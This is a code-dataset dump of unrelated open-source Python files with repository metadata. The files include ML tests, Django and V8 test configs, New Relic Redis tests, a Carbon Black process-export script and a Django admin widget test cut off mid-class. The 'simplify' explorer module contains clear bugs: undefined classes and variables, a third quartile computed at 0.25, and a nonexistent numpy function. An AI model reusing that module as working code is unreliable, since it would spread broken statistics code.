d630c78290a52f8c73885afb16884e18135c34f6
|
[
"Apache-2.0"
] | 7
|
2021-09-23T07:28:46.000Z
|
2021-10-02T21:15:18.000Z
|
import sklearn.ensemble
from autotabular.pipeline.components.regression.gradient_boosting import GradientBoosting
from .test_base import BaseRegressionComponentTest
class GradientBoostingComponentTest(BaseRegressionComponentTest):
__test__ = True
res = dict()
res['default_boston'] = 0.7491382574462079
res['default_boston_iterative'] = 0.7491382574462079
res['default_boston_sparse'] = None
res['boston_n_calls'] = 9
res['default_diabetes'] = 0.2872735632261877
res['default_diabetes_iterative'] = 0.2872735632261877
res['default_diabetes_sparse'] = None
res['diabetes_n_call'] = 11
sk_mod = sklearn.ensemble.GradientBoostingRegressor
module = GradientBoosting
| 31.130435
| 89
| 0.772346
|
1eadd48490f71cd779184bfe1b90fe2b1caac783
| 760
|
py
|
Python
|
readthedocs/profiles/urls/private.py
|
espdev/readthedocs.org
|
5052a06feae56fe5efc9b4c57c430de6007cb7c1
|
[
"MIT"
] | null | null | null |
readthedocs/profiles/urls/private.py
|
espdev/readthedocs.org
|
5052a06feae56fe5efc9b4c57c430de6007cb7c1
|
[
"MIT"
] | null | null | null |
readthedocs/profiles/urls/private.py
|
espdev/readthedocs.org
|
5052a06feae56fe5efc9b4c57c430de6007cb7c1
|
[
"MIT"
] | null | null | null |
from django.conf.urls import patterns, url
from readthedocs.core.forms import UserProfileForm
urlpatterns = patterns('',
url(r'^create/', 'readthedocs.profiles.views.create_profile',
{
'form_class': UserProfileForm,
},
name='profiles_profile_create'),
url(r'^edit/', 'readthedocs.profiles.views.edit_profile',
{
'form_class': UserProfileForm,
'template_name': 'profiles/private/edit_profile.html',
},
name='profiles_profile_edit'),
)
| 42.222222
| 85
| 0.443421
|
36d6d7f168f4b82d7ab64af7de7fa39ba918129c
| 1,096
|
py
|
Python
|
timewave/__init__.py
|
pbrisk/timewave
|
26c81257264079cf11d9644bae02bf9efae3a006
|
[
"Apache-2.0"
] | null | null | null |
timewave/__init__.py
|
pbrisk/timewave
|
26c81257264079cf11d9644bae02bf9efae3a006
|
[
"Apache-2.0"
] | null | null | null |
timewave/__init__.py
|
pbrisk/timewave
|
26c81257264079cf11d9644bae02bf9efae3a006
|
[
"Apache-2.0"
] | 2
|
2017-04-10T13:40:41.000Z
|
2018-05-22T14:04:43.000Z
|
# -*- coding: utf-8 -*-
# timewave
# --------
# timewave, a stochastic process evolution simulation engine in python.
#
# Author: sonntagsgesicht, based on a fork of Deutsche Postbank [pbrisk]
# Version: 0.6, copyright Wednesday, 18 September 2019
# Website: https://github.com/sonntagsgesicht/timewave
# License: Apache License 2.0 (see LICENSE file)
__doc__ = 'timewave, a stochastic process evolution simulation engine in python.'
__license__ = 'Apache License 2.0'
__author__ = 'sonntagsgesicht, based on a fork of Deutsche Postbank [pbrisk]'
__email__ = 'sonntagsgesicht@icloud.com'
__url__ = 'https://github.com/sonntagsgesicht/' + __name__
__date__ = 'Wednesday, 18 September 2019'
__version__ = '0.6'
__dev_status__ = '4 - Beta'
__dependencies__ = ('dill', 'numpy', 'scipy')
__dependency_links__ = ()
__data__ = ()
__scripts__ = ()
import dill as pickle # enable proper pickle for lambda expressions
from .engine import *
from .producers import *
from .consumers import *
from .stochasticprocess import *
from .stochasticproducer import *
from .stochasticconsumer import *
| 29.621622
| 81
| 0.740876
|
073acd303bb938223a4c684811de654defd0a63c
| 6,228
|
py
|
Python
|
simplify/explorer/components.py
|
WithPrecedent/ml_funnel
|
5302da8bf4944ac518d22cc37c181e5a09baaabe
|
[
"Apache-2.0"
] | null | null | null |
simplify/explorer/components.py
|
WithPrecedent/ml_funnel
|
5302da8bf4944ac518d22cc37c181e5a09baaabe
|
[
"Apache-2.0"
] | null | null | null |
simplify/explorer/components.py
|
WithPrecedent/ml_funnel
|
5302da8bf4944ac518d22cc37c181e5a09baaabe
|
[
"Apache-2.0"
] | 2
|
2019-10-07T14:36:26.000Z
|
2020-02-23T00:50:20.000Z
|
"""
explorer.components:
Corey Rayburn Yung <coreyrayburnyung@gmail.com>
Copyright 2020, Corey Rayburn Yung
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
Contents:
"""
from __future__ import annotations
import dataclasses
from types import ModuleType
from typing import (Any, Callable, ClassVar, Dict, Iterable, List, Mapping,
Optional, Sequence, Tuple, Type, Union)
import simplify
from . import base
@dataclasses.dataclass
class Test(SimpleDirector):
"""Applies statistical tests to data.
Args:
name (Optional[str]): designates the name of the class used for internal
referencing throughout siMpLify. If the class needs settings from
the shared 'Idea' instance, 'name' should match the appropriate
section name in 'Idea'. When subclassing, it is a good idea to use
the same 'name' attribute as the base class for effective
coordination between siMpLify classes. 'name' is used instead of
__class__.__name__ to make such subclassing easier. If 'name' is not
provided, __class__.__name__.lower() is used instead.
"""
name: Optional[str] = 'tester'
def __post_init__(self) -> None:
super().__post_init__()
return self
def draft(self) -> None:
super().draft()
options = {
'ks_distribution': ['scipy.stats', 'ks_2samp'],
'ks_goodness': ['scipy.stats', 'kstest'],
'kurtosis_test': ['scipy.stats', 'kurtosistest'],
'normal': ['scipy.stats', 'normaltest'],
'pearson': ['scipy.stats.pearsonr']}
return self
def publish(self):
self.runtime_parameters = {
'y_true': getattr(recipe.dataset, 'y_' + self.data_to_review),
'y_pred': recipe.predictions}
super().implement()
return self
@dataclasses.dataclass
class Summarize(SimpleDirector):
"""Summarizes data.
Args:
name (Optional[str]): designates the name of the class used for internal
referencing throughout siMpLify. If the class needs settings from
the shared 'Idea' instance, 'name' should match the appropriate
section name in 'Idea'. When subclassing, it is a good idea to use
the same 'name' attribute as the base class for effective
coordination between siMpLify classes. 'name' is used instead of
__class__.__name__ to make such subclassing easier. If 'name' is not
provided, __class__.__name__.lower() is used instead.
"""
name: str = 'summarizer'
def __post_init__(self) -> None:
super().__post_init__()
return self
""" Core siMpLify Methods """
def draft(self) -> None:
"""Sets options for Summarize class."""
super().draft()
self._options = SimpleRepository(contents = {
'count': Option(
name = 'count',
module = 'numpy.ndarray',
algorithm = 'size'),
'min': Option(
name = 'minimum',
module = 'numpy',
algorithm = 'nanmin'),
'q1': Option(
name = 'quantile1',
module = 'numpy',
algorithm = 'nanquantile',
required = {'q': 0.25}),
'median': Option(
name = 'median',
module = 'numpy',
algorithm = 'nanmedian'),
'q3': Option(
name = 'quantile3',
module = 'numpy',
algorithm = 'nanquantile',
required = {'q': 0.25}),
'max': Option(
name = '',
module = 'numpy',
algorithm = 'nanmax'),
'mad': Option(
name = 'median absoluate deviation',
module = 'scipy.stats',
algorithm = 'median_absolute_deviation',
required = {'nan_policy': 'omit'}),
'mean': Option(
name = 'mean',
module = 'numpy',
algorithm = 'nanmean'),
'std': Option(
name = 'standard deviation',
module = 'numpy',
algorithm = 'nanstd'),
'standard_error': Option(
name = 'standard_error',
module = 'scipy.stats',
algorithm = 'sem',
required = {'nan_policy': 'omit'}),
'geometric_mean': Option(
name = 'geometric_mean',
module = 'scipy.stats',
algorithm = 'gmean'),
'geometric_std': Option(
name = 'geometric_standard_deviation',
module = 'scipy.stats',
algorithm = 'gstd'),
'harmonic_mean': Option(
name = 'harmonic_mean',
module = 'scipy.stats',
algorithm = 'hmean'),
'mode': Option(
name = 'mode',
module = 'scipy.stats',
algorithm = 'mode',
required = {'nan_policy': 'omit'}),
'sum': Option(
name = 'sum',
module = 'numpy',
algorithm = 'nansum'),
'kurtosis': Option(
name = 'kurtosis',
module = 'scipy.stats',
algorithm = 'kurtosis',
required = {'nan_policy': 'omit'}),
'skew': Option(
name = 'skew',
module = 'scipy.stats',
algorithm = 'skew',
required = {'nan_policy': 'omit'}),
'variance': Option(
name = 'variance',
module = 'numpy',
algorithm = 'nanvar'),
'variation': Option(
name = 'variation',
module = 'scipy.stats',
algorithm = 'variation',
required = {'nan_policy': 'omit'}),
'unique': Option(
name = 'unique_values',
module = 'numpy',
algorithm = 'nunique')}
return self
| 35.186441
| 80
| 0.506423
|
66ddd68b0f1ac6dd2f975a0689ce68fe6dbb0785
| 4,414
|
py
|
Python
|
best_cn_finetune/squad-style-data/cmrc2018_evaluate.py
|
you-know-who-2017/QA_MRC
|
323591995ac4ca0ca39e6101f6ff1c6f88104bc8
|
[
"MIT"
] | null | null | null |
best_cn_finetune/squad-style-data/cmrc2018_evaluate.py
|
you-know-who-2017/QA_MRC
|
323591995ac4ca0ca39e6101f6ff1c6f88104bc8
|
[
"MIT"
] | null | null | null |
best_cn_finetune/squad-style-data/cmrc2018_evaluate.py
|
you-know-who-2017/QA_MRC
|
323591995ac4ca0ca39e6101f6ff1c6f88104bc8
|
[
"MIT"
] | null | null | null |
'''
Author: geekli
Date: 2020-12-28 15:51:58
LastEditTime: 2020-12-28 15:52:08
LastEditors: your name
Description:
FilePath: \QA_MRC\squad-style-data\cmrc2018_evaluate.py
'''
# -*- coding: utf-8 -*-
'''
Evaluation script for CMRC 2018
version: v5 - special
Note:
v5 - special: Evaluate on SQuAD-style CMRC 2018 Datasets
v5: formatted output, add usage description
v4: fixed segmentation issues
'''
from __future__ import print_function
from collections import Counter, OrderedDict
import string
import re
import argparse
import json
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import nltk
import pdb
# split Chinese with English
def mixed_segmentation(in_str, rm_punc=False):
in_str = str(in_str).decode('utf-8').lower().strip()
segs_out = []
temp_str = ""
sp_char = ['-',':','_','*','^','/','\\','~','`','+','=',
',','。',':','?','!','“','”',';','’','《','》','……','·','、',
'「','」','(',')','-','~','『','』']
for char in in_str:
if rm_punc and char in sp_char:
continue
if re.search(ur'[\u4e00-\u9fa5]', char) or char in sp_char:
if temp_str != "":
ss = nltk.word_tokenize(temp_str)
segs_out.extend(ss)
temp_str = ""
segs_out.append(char)
else:
temp_str += char
#handling last part
if temp_str != "":
ss = nltk.word_tokenize(temp_str)
segs_out.extend(ss)
return segs_out
# remove punctuation
def remove_punctuation(in_str):
in_str = str(in_str).decode('utf-8').lower().strip()
sp_char = ['-',':','_','*','^','/','\\','~','`','+','=',
',','。',':','?','!','“','”',';','’','《','》','……','·','、',
'「','」','(',')','-','~','『','』']
out_segs = []
for char in in_str:
if char in sp_char:
continue
else:
out_segs.append(char)
return ''.join(out_segs)
# find longest common string
def find_lcs(s1, s2):
m = [[0 for i in range(len(s2)+1)] for j in range(len(s1)+1)]
mmax = 0
p = 0
for i in range(len(s1)):
for j in range(len(s2)):
if s1[i] == s2[j]:
m[i+1][j+1] = m[i][j]+1
if m[i+1][j+1] > mmax:
mmax=m[i+1][j+1]
p=i+1
return s1[p-mmax:p], mmax
#
def evaluate(ground_truth_file, prediction_file):
f1 = 0
em = 0
total_count = 0
skip_count = 0
for instance in ground_truth_file["data"]:
#context_id = instance['context_id'].strip()
#context_text = instance['context_text'].strip()
for para in instance["paragraphs"]:
for qas in para['qas']:
total_count += 1
query_id = qas['id'].strip()
query_text = qas['question'].strip()
answers = [x["text"] for x in qas['answers']]
if query_id not in prediction_file:
sys.stderr.write('Unanswered question: {}\n'.format(query_id))
skip_count += 1
continue
prediction = str(prediction_file[query_id]).decode('utf-8')
f1 += calc_f1_score(answers, prediction)
em += calc_em_score(answers, prediction)
f1_score = 100.0 * f1 / total_count
em_score = 100.0 * em / total_count
return f1_score, em_score, total_count, skip_count
def calc_f1_score(answers, prediction):
f1_scores = []
for ans in answers:
ans_segs = mixed_segmentation(ans, rm_punc=True)
prediction_segs = mixed_segmentation(prediction, rm_punc=True)
lcs, lcs_len = find_lcs(ans_segs, prediction_segs)
if lcs_len == 0:
f1_scores.append(0)
continue
precision = 1.0*lcs_len/len(prediction_segs)
recall = 1.0*lcs_len/len(ans_segs)
f1 = (2*precision*recall)/(precision+recall)
f1_scores.append(f1)
return max(f1_scores)
def calc_em_score(answers, prediction):
em = 0
for ans in answers:
ans_ = remove_punctuation(ans)
prediction_ = remove_punctuation(prediction)
if ans_ == prediction_:
em = 1
break
return em
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Evaluation Script for CMRC 2018')
parser.add_argument('dataset_file', help='Official dataset file')
parser.add_argument('prediction_file', help='Your prediction File')
args = parser.parse_args()
ground_truth_file = json.load(open(args.dataset_file, 'rb'))
prediction_file = json.load(open(args.prediction_file, 'rb'))
F1, EM, TOTAL, SKIP = evaluate(ground_truth_file, prediction_file)
AVG = (EM+F1)*0.5
output_result = OrderedDict()
output_result['AVERAGE'] = '%.3f' % AVG
output_result['F1'] = '%.3f' % F1
output_result['EM'] = '%.3f' % EM
output_result['TOTAL'] = TOTAL
output_result['SKIP'] = SKIP
output_result['FILE'] = args.prediction_file
print(json.dumps(output_result))
| 27.416149
| 80
| 0.651337
|
6bb8d3ef5b2c5846e402829fbe273dafddc4507d
| 771
|
py
|
Python
|
cansi-pattern-state/w/v/tStateState_h.py
|
lopesivan/cansi-pattern
|
d41e379e728682ed41863104984e05221d347d8e
|
[
"Apache-2.0"
] | null | null | null |
cansi-pattern-state/w/v/tStateState_h.py
|
lopesivan/cansi-pattern
|
d41e379e728682ed41863104984e05221d347d8e
|
[
"Apache-2.0"
] | null | null | null |
cansi-pattern-state/w/v/tStateState_h.py
|
lopesivan/cansi-pattern
|
d41e379e728682ed41863104984e05221d347d8e
|
[
"Apache-2.0"
] | null | null | null |
"""Classe de template."""
from .factory import Factory
class TStateState_h(Factory):
"""Classe de template."""
def __init__(self, data_model, template_name, index):
Factory.__init__(self, template_name)
self.data_model = data_model
self.tmpl.index = index
self.tmpl.name = "StateState_h"
self.tmpl.state = data_model['state']
def put(self):
fileName = "%sState.h" % self.tmpl.state['states'][self.tmpl.index]['name'].capitalize()
print ("File: %s" % fileName)
print self.tmpl
def save(self):
fileName = "%sState.h" % self.tmpl.state['states'][self.tmpl.index]['name'].capitalize()
print ("Save File: %s" % fileName)
open(fileName, 'w').write(str(self.tmpl))
| 27.535714
| 96
| 0.616083
|
09d29d0bee066d1fea8e5591ba589a403c537bb4
| 2,905
|
py
|
Python
|
deps/v8/test/intl/testcfg.py
|
WigWagCo/node
|
e6e85cbab339699420e4fb7ce4de9b0ba8d58d18
|
[
"Artistic-2.0"
] | 2
|
2015-03-16T01:58:21.000Z
|
2021-06-12T05:39:52.000Z
|
deps/v8/test/intl/testcfg.py
|
hafeez-syed/node
|
5b230007adba91163a2f49dbdd9a16d5834fd322
|
[
"Artistic-2.0"
] | null | null | null |
deps/v8/test/intl/testcfg.py
|
hafeez-syed/node
|
5b230007adba91163a2f49dbdd9a16d5834fd322
|
[
"Artistic-2.0"
] | 1
|
2021-03-15T17:23:59.000Z
|
2021-03-15T17:23:59.000Z
|
# Copyright 2013 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
from testrunner.local import testsuite
from testrunner.objects import testcase
class IntlTestSuite(testsuite.TestSuite):
def __init__(self, name, root):
super(IntlTestSuite, self).__init__(name, root)
def ListTests(self, context):
tests = []
for dirname, dirs, files in os.walk(self.root):
for dotted in [x for x in dirs if x.startswith('.')]:
dirs.remove(dotted)
dirs.sort()
files.sort()
for filename in files:
if (filename.endswith(".js") and filename != "assert.js" and
filename != "utils.js"):
testname = os.path.join(dirname[len(self.root) + 1:], filename[:-3])
test = testcase.TestCase(self, testname)
tests.append(test)
return tests
def GetFlagsForTestCase(self, testcase, context):
flags = ["--allow-natives-syntax"] + context.mode_flags
files = []
files.append(os.path.join(self.root, "assert.js"))
files.append(os.path.join(self.root, "utils.js"))
files.append(os.path.join(self.root, "date-format", "utils.js"))
files.append(os.path.join(self.root, testcase.path + self.suffix()))
flags += files
if context.isolates:
flags.append("--isolate")
flags += files
return testcase.flags + flags
def GetSuite(name, root):
return IntlTestSuite(name, root)
| 39.794521
| 78
| 0.712909
|
8f570101d1f919766d1bb429758857e1be19160d
| 4,133
|
py
|
Python
|
tests/datastore_redis/test_multiple_dbs.py
|
newrelic/newrelic-python-agen
|
4f292ec1219c0daffc5721a7b3a245b97d0f83ba
|
[
"Apache-2.0"
] | 92
|
2020-06-12T17:53:23.000Z
|
2022-03-01T11:13:21.000Z
|
tests/datastore_redis/test_multiple_dbs.py
|
newrelic/newrelic-python-agen
|
4f292ec1219c0daffc5721a7b3a245b97d0f83ba
|
[
"Apache-2.0"
] | 347
|
2020-07-10T00:10:19.000Z
|
2022-03-31T17:58:56.000Z
|
tests/datastore_redis/test_multiple_dbs.py
|
newrelic/newrelic-python-agen
|
4f292ec1219c0daffc5721a7b3a245b97d0f83ba
|
[
"Apache-2.0"
] | 58
|
2020-06-17T13:51:57.000Z
|
2022-03-06T14:26:53.000Z
|
# Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import redis
from newrelic.api.background_task import background_task
from testing_support.fixtures import (validate_transaction_metrics,
override_application_settings)
from testing_support.db_settings import redis_settings
from testing_support.util import instance_hostname
DB_MULTIPLE_SETTINGS = redis_settings()
# Settings
_enable_instance_settings = {
'datastore_tracer.instance_reporting.enabled': True,
}
_disable_instance_settings = {
'datastore_tracer.instance_reporting.enabled': False,
}
# Metrics
_base_scoped_metrics = (
('Datastore/operation/Redis/get', 1),
('Datastore/operation/Redis/set', 1),
('Datastore/operation/Redis/client_list', 1),
)
_base_rollup_metrics = (
('Datastore/all', 3),
('Datastore/allOther', 3),
('Datastore/Redis/all', 3),
('Datastore/Redis/allOther', 3),
('Datastore/operation/Redis/get', 1),
('Datastore/operation/Redis/get', 1),
('Datastore/operation/Redis/client_list', 1),
)
_disable_scoped_metrics = list(_base_scoped_metrics)
_disable_rollup_metrics = list(_base_rollup_metrics)
_enable_scoped_metrics = list(_base_scoped_metrics)
_enable_rollup_metrics = list(_base_rollup_metrics)
if len(DB_MULTIPLE_SETTINGS) > 1:
redis_1 = DB_MULTIPLE_SETTINGS[0]
redis_2 = DB_MULTIPLE_SETTINGS[1]
host_1 = instance_hostname(redis_1['host'])
port_1 = redis_1['port']
host_2 = instance_hostname(redis_2['host'])
port_2 = redis_2['port']
instance_metric_name_1 = 'Datastore/instance/Redis/%s/%s' % (host_1, port_1)
instance_metric_name_2 = 'Datastore/instance/Redis/%s/%s' % (host_2, port_2)
_enable_rollup_metrics.extend([
(instance_metric_name_1, 2),
(instance_metric_name_2, 1),
])
_disable_rollup_metrics.extend([
(instance_metric_name_1, None),
(instance_metric_name_2, None),
])
def exercise_redis(client_1, client_2):
client_1.set('key', 'value')
client_1.get('key')
client_2.execute_command('CLIENT', 'LIST', parse='LIST')
@pytest.mark.skipif(len(DB_MULTIPLE_SETTINGS) < 2,
reason='Test environment not configured with multiple databases.')
@override_application_settings(_enable_instance_settings)
@validate_transaction_metrics('test_multiple_dbs:test_multiple_datastores_enabled',
scoped_metrics=_enable_scoped_metrics,
rollup_metrics=_enable_rollup_metrics,
background_task=True)
@background_task()
def test_multiple_datastores_enabled():
redis1 = DB_MULTIPLE_SETTINGS[0]
redis2 = DB_MULTIPLE_SETTINGS[1]
client_1 = redis.StrictRedis(host=redis1['host'], port=redis1['port'], db=0)
client_2 = redis.StrictRedis(host=redis2['host'], port=redis2['port'], db=1)
exercise_redis(client_1, client_2)
@pytest.mark.skipif(len(DB_MULTIPLE_SETTINGS) < 2,
reason='Test environment not configured with multiple databases.')
@override_application_settings(_disable_instance_settings)
@validate_transaction_metrics('test_multiple_dbs:test_multiple_datastores_disabled',
scoped_metrics=_disable_scoped_metrics,
rollup_metrics=_disable_rollup_metrics,
background_task=True)
@background_task()
def test_multiple_datastores_disabled():
redis1 = DB_MULTIPLE_SETTINGS[0]
redis2 = DB_MULTIPLE_SETTINGS[1]
client_1 = redis.StrictRedis(host=redis1['host'], port=redis1['port'], db=0)
client_2 = redis.StrictRedis(host=redis2['host'], port=redis2['port'], db=1)
exercise_redis(client_1, client_2)
| 34.441667
| 84
| 0.739656
|
a46decdd077a08dce6b0d6f206a63de089489592
| 211
|
py
|
Python
|
web/producer.py
|
itamarsky/devops-tasks
|
c3fa44c4825f5157c78c9853d153946e37f33bca
|
[
"MIT"
] | null | null | null |
web/producer.py
|
itamarsky/devops-tasks
|
c3fa44c4825f5157c78c9853d153946e37f33bca
|
[
"MIT"
] | null | null | null |
web/producer.py
|
itamarsky/devops-tasks
|
c3fa44c4825f5157c78c9853d153946e37f33bca
|
[
"MIT"
] | null | null | null |
from kafka import KafkaProducer
import json
def producer():
return KafkaProducer(security_protocol="PLAINTEXT", value_serializer=lambda v: json.dumps(v).encode('utf-8'), bootstrap_servers=['kafka:9092'])
| 26.375
| 147
| 0.772512
|
75ae387568013a16b49212fc9a709fa2d5a51cea
| 2,096
|
py
|
Python
|
examples/threathunter/process_exporter.py
|
rathnadeep/cbapi-python
|
55375d8796a9d88d00bd16df13d71a2d8d76dd9c
|
[
"MIT"
] | null | null | null |
examples/threathunter/process_exporter.py
|
rathnadeep/cbapi-python
|
55375d8796a9d88d00bd16df13d71a2d8d76dd9c
|
[
"MIT"
] | null | null | null |
examples/threathunter/process_exporter.py
|
rathnadeep/cbapi-python
|
55375d8796a9d88d00bd16df13d71a2d8d76dd9c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import sys
from cbapi.example_helpers import build_cli_parser, get_cb_threathunter_object
from cbapi.psc.threathunter import Process
import json
import csv
def main():
parser = build_cli_parser("Query processes")
parser.add_argument("-p", type=str, help="process guid", default=None)
parser.add_argument("-q",type=str,help="query string",default=None)
parser.add_argument("-s",type=bool, help="silent mode",default=False)
parser.add_argument("-n", type=int, help="only output N events", default=None)
parser.add_argument("-f", type=str, help="output file name",default=None)
parser.add_argument("-of", type=str,help="output file format: csv or json",default="json")
args = parser.parse_args()
cb = get_cb_threathunter_object(args)
if not args.p and not args.q:
print("Error: Missing Process GUID to search for events with")
sys.exit(1)
if args.q:
processes = cb.select(Process).where(args.q)
else:
processes = cb.select(Process).where(process_guid=args.p)
if args.n:
processes = [ p for p in processes[0:args.n]]
if not args.s:
for process in processes:
print("Process: {}".format(process.process_name))
print("\tPIDs: {}".format(process.process_pids))
print("\tSHA256: {}".format(process.process_sha256))
print("\tGUID: {}".format(process.process_guid))
if args.f is not None:
if args.of == "json":
with open(args.f, 'w') as outfile:
for p in processes:
json.dump(p.original_document, outfile, indent = 4)
else:
with open(args.f, 'w') as outfile:
csvwriter = csv.writer(outfile)
for p in processes:
csvwriter.writerow(p.original_document)
if __name__ == "__main__":
sys.exit(main())
| 37.428571
| 97
| 0.574905
|
1bb4c9a9b142776cd3e71da160e067bdf50a61a2
| 64,601
|
py
|
Python
|
tests/admin_widgets/tests.py
|
stevenheroo/django
|
676bd084f2509f4201561d5c77ed4ecbd157bfa0
|
[
"BSD-3-Clause",
"0BSD"
] | null | null | null |
tests/admin_widgets/tests.py
|
stevenheroo/django
|
676bd084f2509f4201561d5c77ed4ecbd157bfa0
|
[
"BSD-3-Clause",
"0BSD"
] | 1
|
2021-05-19T06:22:48.000Z
|
2021-05-19T06:22:48.000Z
|
tests/admin_widgets/tests.py
|
stevenheroo/django
|
676bd084f2509f4201561d5c77ed4ecbd157bfa0
|
[
"BSD-3-Clause",
"0BSD"
] | 2
|
2021-10-13T10:49:28.000Z
|
2021-11-30T12:33:33.000Z
|
import gettext
import os
import re
from datetime import datetime, timedelta
from importlib import import_module
import pytz
from django import forms
from django.conf import settings
from django.contrib import admin
from django.contrib.admin import widgets
from django.contrib.admin.tests import AdminSeleniumTestCase
from django.contrib.auth.models import User
from django.core.files.storage import default_storage
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db.models import (
CharField, DateField, DateTimeField, ManyToManyField, UUIDField,
)
from django.test import SimpleTestCase, TestCase, override_settings
from django.urls import reverse
from django.utils import translation
from .models import (
Advisor, Album, Band, Bee, Car, Company, Event, Honeycomb, Individual,
Inventory, Member, MyFileField, Profile, School, Student,
UnsafeLimitChoicesTo, VideoStream,
)
from .widgetadmin import site as widget_admin_site
class TestDataMixin:
@classmethod
def setUpTestData(cls):
cls.superuser = User.objects.create_superuser(username='super', password='secret', email=None)
cls.u2 = User.objects.create_user(username='testser', password='secret')
Car.objects.create(owner=cls.superuser, make='Volkswagen', model='Passat')
Car.objects.create(owner=cls.u2, make='BMW', model='M3')
class AdminFormfieldForDBFieldTests(SimpleTestCase):
"""
Tests for correct behavior of ModelAdmin.formfield_for_dbfield
"""
def assertFormfield(self, model, fieldname, widgetclass, **admin_overrides):
"""
Helper to call formfield_for_dbfield for a given model and field name
and verify that the returned formfield is appropriate.
"""
# Override any settings on the model admin
class MyModelAdmin(admin.ModelAdmin):
pass
for k in admin_overrides:
setattr(MyModelAdmin, k, admin_overrides[k])
# Construct the admin, and ask it for a formfield
ma = MyModelAdmin(model, admin.site)
ff = ma.formfield_for_dbfield(model._meta.get_field(fieldname), request=None)
# "unwrap" the widget wrapper, if needed
if isinstance(ff.widget, widgets.RelatedFieldWidgetWrapper):
widget = ff.widget.widget
else:
widget = ff.widget
self.assertIsInstance(widget, widgetclass)
# Return the formfield so that other tests can continue
return ff
def test_DateField(self):
self.assertFormfield(Event, 'start_date', widgets.AdminDateWidget)
def test_DateTimeField(self):
self.assertFormfield(Member, 'birthdate', widgets.AdminSplitDateTime)
def test_TimeField(self):
self.assertFormfield(Event, 'start_time', widgets.AdminTimeWidget)
def test_TextField(self):
self.assertFormfield(Event, 'description', widgets.AdminTextareaWidget)
def test_URLField(self):
self.assertFormfield(Event, 'link', widgets.AdminURLFieldWidget)
def test_IntegerField(self):
self.assertFormfield(Event, 'min_age', widgets.AdminIntegerFieldWidget)
def test_CharField(self):
self.assertFormfield(Member, 'name', widgets.AdminTextInputWidget)
def test_EmailField(self):
self.assertFormfield(Member, 'email', widgets.AdminEmailInputWidget)
def test_FileField(self):
self.assertFormfield(Album, 'cover_art', widgets.AdminFileWidget)
def test_ForeignKey(self):
self.assertFormfield(Event, 'main_band', forms.Select)
def test_raw_id_ForeignKey(self):
self.assertFormfield(Event, 'main_band', widgets.ForeignKeyRawIdWidget,
raw_id_fields=['main_band'])
def test_radio_fields_ForeignKey(self):
ff = self.assertFormfield(Event, 'main_band', widgets.AdminRadioSelect,
radio_fields={'main_band': admin.VERTICAL})
self.assertIsNone(ff.empty_label)
def test_many_to_many(self):
self.assertFormfield(Band, 'members', forms.SelectMultiple)
def test_raw_id_many_to_many(self):
self.assertFormfield(Band, 'members', widgets.ManyToManyRawIdWidget,
raw_id_fields=['members'])
def test_filtered_many_to_many(self):
self.assertFormfield(Band, 'members', widgets.FilteredSelectMultiple,
filter_vertical=['members'])
def test_formfield_overrides(self):
self.assertFormfield(Event, 'start_date', forms.TextInput,
formfield_overrides={DateField: {'widget': forms.TextInput}})
def test_formfield_overrides_widget_instances(self):
"""
Widget instances in formfield_overrides are not shared between
different fields. (#19423)
"""
class BandAdmin(admin.ModelAdmin):
formfield_overrides = {
CharField: {'widget': forms.TextInput(attrs={'size': '10'})}
}
ma = BandAdmin(Band, admin.site)
f1 = ma.formfield_for_dbfield(Band._meta.get_field('name'), request=None)
f2 = ma.formfield_for_dbfield(Band._meta.get_field('style'), request=None)
self.assertNotEqual(f1.widget, f2.widget)
self.assertEqual(f1.widget.attrs['maxlength'], '100')
self.assertEqual(f2.widget.attrs['maxlength'], '20')
self.assertEqual(f2.widget.attrs['size'], '10')
def test_formfield_overrides_m2m_filter_widget(self):
"""
The autocomplete_fields, raw_id_fields, filter_vertical, and
filter_horizontal widgets for ManyToManyFields may be overridden by
specifying a widget in formfield_overrides.
"""
class BandAdmin(admin.ModelAdmin):
filter_vertical = ['members']
formfield_overrides = {
ManyToManyField: {'widget': forms.CheckboxSelectMultiple},
}
ma = BandAdmin(Band, admin.site)
field = ma.formfield_for_dbfield(Band._meta.get_field('members'), request=None)
self.assertIsInstance(field.widget.widget, forms.CheckboxSelectMultiple)
def test_formfield_overrides_for_datetime_field(self):
"""
Overriding the widget for DateTimeField doesn't overrides the default
form_class for that field (#26449).
"""
class MemberAdmin(admin.ModelAdmin):
formfield_overrides = {DateTimeField: {'widget': widgets.AdminSplitDateTime}}
